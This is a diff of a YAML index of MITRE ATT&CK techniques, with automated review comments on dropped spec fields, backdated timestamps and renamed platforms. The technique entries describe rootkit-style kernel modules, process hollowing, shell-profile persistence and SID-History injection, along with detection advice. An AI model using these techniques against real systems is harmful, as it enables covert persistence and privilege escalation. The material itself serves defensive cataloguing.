- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
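Review bot: the `spec_version: '2.1'` line removed just before `identifier: T1547.006` is dropped again for every object in the later hunks of this patch, with nothing added in its place. `spec_version` is a required property on every STIX 2.1 object, so any consumer that validates these technique records as STIX 2.1 will reject them once it is gone. If the field is being dropped on purpose because this index is never consumed as STIX, say so in the commit message; otherwise keep it next to the new `x_mitre_attack_spec_version: 3.2.0`. Two smaller points in the same hunk: the `iDefense Rootkit Overview` reference moves to https with a September 12, 2024 retrieval date, which is fine; and the `description` and `x_mitre_detection` block scalars show `kextload`, `and kextunload`, `modprobe`, `, insmod` and so on as separate unindented lines. If that is how the file is actually stored rather than how it was rendered, an unindented line terminates the `|-` / `|` block early and the YAML will not parse, so confirm each of those sentences is a single indented line in the source.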
@@ -20888,7 +21202,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
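Review bot: the `modified` timestamp for KernelCallbackTable moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-03-22T15:47:33.915Z`; a resync normally only advances this field. The same backward move appears further down for T1068, T1134.005 and T1548.004. If the old `14:00:00.188Z` values were bulk release stamps and the new ones are the per-object values from upstream, state that in the commit message; otherwise this reads as the index being regenerated from an older snapshot and should be checked before merge.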
@@ -20914,12 +21228,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
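Review bot: T1574.013 loses `x_mitre_attack_spec_version: 2.1.0` here and nothing in this hunk adds it back, while the other objects in this patch are set to `x_mitre_attack_spec_version: 3.2.0`. Unless the field is reinstated in a part of the object outside this hunk, T1574.013 ends up with no ATT&CK spec version at all; add `x_mitre_attack_spec_version: 3.2.0` beside `x_mitre_modified_by_ref`, as the T1053.006 and T1078 hunks do.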
@@ -20997,9 +21309,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1574:
@@ -21066,7 +21377,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -21140,11 +21450,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -21161,7 +21470,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -21171,7 +21479,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21180,19 +21488,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
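Review bot: the platform list for T1078 drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider`, so anything that selects techniques by the old platform strings will stop matching T1078 after this change. The `x_mitre_version` bump from `2.6` to `2.7` suggests this is an upstream content change rather than a local edit, but confirm that the platform-keyed consumers of this index are updated to the new names in the same change so T1078 is not silently dropped from the per-platform views.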
@@ -21240,11 +21546,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -21312,23 +21619,22 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
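Review bot: T1068's `modified` regresses from `2023-10-31T14:00:00.188Z` to `2023-04-07T17:13:54.168Z`, the same backward pattern flagged on the KernelCallbackTable hunk; confirm this is the upstream value. Separately, the `Leitch Hollowing` reference now points at a third-party upload (`new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf`) instead of the original `autosectools.com` URL. A mirror is reasonable for a dead link, but either note in the description that it is a mirror or prefer an archive.org snapshot of the original, as the `bencane blog bashrc` entry does later in this patch.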
@@ -21391,11 +21697,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
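Review bot: T1068 keeps `x_mitre_attack_spec_version: 3.1.0` (the unchanged context line above `x_mitre_modified_by_ref`) while the neighbouring objects in this patch are bumped to `3.2.0`. That mix is expected if each object carries the spec version current when it was last modified, but if the intent of this patch is to normalise every object to `3.2.0`, T1068 has been missed; state which of the two is intended in the commit message.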
@@ -21448,8 +21753,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -21497,78 +21802,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
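Review bot: confirm that every field removed here reappears later in the patch: `x_mitre_platforms`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the full `external_references` list. By my read they all do in the three T1546.004 hunks that follow, so this hunk is net a key reorder plus the `modified` bump to `2024-09-25T15:02:24.143Z`; the only reference whose content changes is `bencane blog bashrc`. A one-line commit message note that the object was regenerated from upstream would spare the next reviewer the same cross-check.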
@@ -21616,6 +21854,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -21626,9 +21868,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -21637,8 +21883,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1134.005:
@@ -21684,7 +21989,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
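Review bot: the `modified` value for T1134.005 moves backwards in time here, from `'2022-04-25T14:00:00.188Z'` to `'2021-02-09T15:49:58.414Z'`, and the same regression recurs in most of the `modified` hunks below. The old values all share the `14:00:00.188Z` pattern, which looks like a release-level normalization rather than a per-object timestamp, so the new values are plausibly the real upstream STIX `modified` fields; please confirm that in the PR description, because any consumer that uses `modified` to detect "newer" content will read these as downgrades.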
@@ -21709,13 +22014,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
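Review bot: this hunk drops both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1134.005, while the next hunk keeps `x_mitre_attack_spec_version: 2.1.0` on T1548.004 and removes only `spec_version`. `spec_version` is a required property on STIX 2.1 objects, so after this change the embedded technique objects no longer round-trip into valid STIX without re-adding it; if the generator now deliberately strips it, say so in the PR, and either keep `x_mitre_attack_spec_version` on every object or explain why it is absent from some (the same asymmetry shows up again for T1037.003, T1055.009, T1055.005, T1055.008 and T1037.001 below).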
@@ -21795,7 +22098,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
